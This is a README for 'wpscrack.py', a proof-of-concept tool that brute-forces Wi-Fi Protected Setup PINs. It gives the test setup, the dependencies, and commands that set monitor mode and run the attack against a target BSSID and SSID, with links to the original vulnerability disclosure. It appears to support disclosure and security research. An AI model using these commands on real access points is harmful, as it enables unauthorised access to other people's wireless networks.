PoC implementation of a brute force attack against WPS - PIN External Registrar
My test environment was Backtrack 5R1 + an Atheros USB adapter. I used a mac80211/carl9170 driver but any mac80211-based driver should be ok.
Original version: Stefan Viehböck
Minor improvements: Michael Löffler
- PyCrypto
- Scapy (2.2.0) (does not come with Backtrack)
iwconfig mon0 channel X
./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v
Show further usage parameters:
./wpscrack.py --help
http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/ http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc http://hostap.epitest.fi/wpa_supplicant/